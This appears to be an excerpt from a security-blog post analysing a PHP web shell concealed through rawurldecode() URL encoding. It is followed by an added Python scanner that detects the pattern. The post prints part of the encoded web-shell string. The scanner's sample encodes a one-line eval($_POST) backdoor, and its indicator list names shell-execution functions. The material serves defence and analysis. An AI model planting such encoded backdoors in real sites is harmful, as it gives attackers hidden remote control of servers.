Backdoor Obfuscation: tempnam & URL Encoding

Published on 09/28/2020 – Last Updated on 09/28/2020 by OTC

In an attempt to avoid detection, attackers and malware authors are always experimenting with different methods to obfuscate their malicious code.

During a recent investigation, we came across an interesting backdoor that was leveraging encoding along with common PHP functions to conceal its operations from any active security systems on the host.

This PHP web shell uses the following obfuscation method: the web shell code is stored in URL-encoded form and assigned to the variable $i via rawurldecode():

$i = rawurldecode("%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20htm
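A defender-side check for this pattern, added here as an example and not part of the original post or of Sucuri's tooling: it scans PHP source for rawurldecode()/urldecode() calls whose string literal is mostly percent-encoded, decodes the literal, and reports it when the result contains a PHP open tag, eval, a shell function or superglobal input handling. The sample file, the 30% encoded-ratio threshold and the indicator list are constructed assumptions.

```python
import re
from urllib.parse import unquote

# rawurldecode()/urldecode() calls whose argument is a quoted string literal.
DECODE_CALL = re.compile(r'\b(rawurldecode|urldecode)\s*\(\s*(["\'])([^"\']+)\2\s*\)')
PCT_BYTE = re.compile(r'%[0-9A-Fa-f]{2}')

# Markers of executable code or request handling that should not appear in
# ordinary URL-decoded data such as file names or query strings (assumed list).
INDICATORS = {
    "php_open_tag": r"<\?php",
    "eval": r"\beval\s*\(",
    "shell_exec": r"\b(?:system|shell_exec|passthru|exec)\s*\(",
    "user_input": r"\$_(?:POST|GET|REQUEST|COOKIE)\b",
    "magic_quotes_compat": r"\bget_magic_quotes_gpc\s*\(",
}

def scan_php_source(source: str, min_encoded_ratio: float = 0.3) -> list[dict]:
    """Return one finding per decode call whose literal is mostly percent-encoded
    and decodes to something that looks like PHP code."""
    findings = []
    for m in DECODE_CALL.finditer(source):
        literal = m.group(3)
        # Share of the literal made of %XX escapes; benign data rarely exceeds a few percent.
        ratio = 3 * len(PCT_BYTE.findall(literal)) / len(literal)
        if ratio < min_encoded_ratio:
            continue
        decoded = unquote(literal)
        hits = sorted(n for n, p in INDICATORS.items() if re.search(p, decoded))
        if hits:
            findings.append({
                "function": m.group(1),
                "line": source.count("\n", 0, m.start()) + 1,
                "encoded_ratio": round(ratio, 2),
                "indicators": hits,
                "decoded_preview": decoded[:80],
            })
    return findings

# Constructed sample: one legitimate decode and one that mirrors the post's pattern.
SAMPLE_PHP = r'''<?php
$name = rawurldecode("report%20final.pdf");
$i = rawurldecode("%3C%3Fphp%0A%20set_time_limit%280%29%3Beval%28%24_POST%5B%27c%27%5D%29%3B%3F%3E");
'''

if __name__ == "__main__":
    for finding in scan_php_source(SAMPLE_PHP):
        print(finding)
```

The decoded string alone is inert; what makes it a backdoor is the later step that writes or evaluates it, so a hit here is a lead for manual review of how $i is used, not a verdict on its own.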

Continue reading Backdoor Obfuscation: tempnam & URL Encoding at Sucuri Blog.
